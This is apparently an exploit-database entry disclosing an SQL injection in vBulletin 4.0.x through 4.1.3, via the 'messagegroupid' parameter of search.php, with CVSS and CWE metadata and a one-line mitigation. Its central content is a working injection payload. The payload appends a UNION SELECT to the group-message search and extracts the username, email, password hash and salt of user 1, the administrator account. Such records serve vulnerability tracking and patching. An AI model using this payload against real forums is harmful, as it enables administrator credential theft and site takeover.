vendor:
Vbulletin
by:
FB1H2S
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vbulletin
Affected Version From: 4.0.x
Affected Version To: 4.1.2003
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin:4.1.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Relevant OS
2011
Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation. Post data on: search.php?search_type=1, Keywords: Valid Group Message, Search Type: Group Messages, Search in Group: Valid Group Id &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
Mitigation:
Input validation should be done properly to prevent SQL injection attacks.